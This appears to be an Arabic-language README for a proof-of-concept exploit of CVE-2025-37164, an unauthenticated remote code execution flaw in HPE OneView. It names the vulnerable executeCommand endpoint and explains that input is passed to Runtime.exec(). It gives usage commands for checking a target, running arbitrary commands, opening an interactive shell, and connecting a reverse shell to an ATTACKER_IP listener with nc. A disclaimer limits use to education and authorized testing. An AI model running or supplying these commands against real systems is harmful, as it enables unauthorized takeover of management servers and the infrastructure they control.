
إثبات مفهوم لاستغلال CVE-2025-37164، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في HPE OneView عبر نقطة النهاية /rest/id-pools/executeCommand.
استغلال لإثبات المفهوم (Proof-of-Concept) لثغرة CVE-2025-37164، وهي ثغرة حرجة (CVSS 10.0) تسمح بتنفيذ كود عن بُعد دون مصادقة في HPE OneView.
يُقدَّم هذا البرنامج لأغراض التعليم واختبار الأمان المصرح به فقط.
التحليل الفني: توجد الثغرة في نقطة النهاية PUT /rest/id-pools/executeCommand التي لا تتطلب مصادقة وتمرر المدخلات التي يتحكم فيها المستخدم مباشرةً إلى Runtime.exec().
requests (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444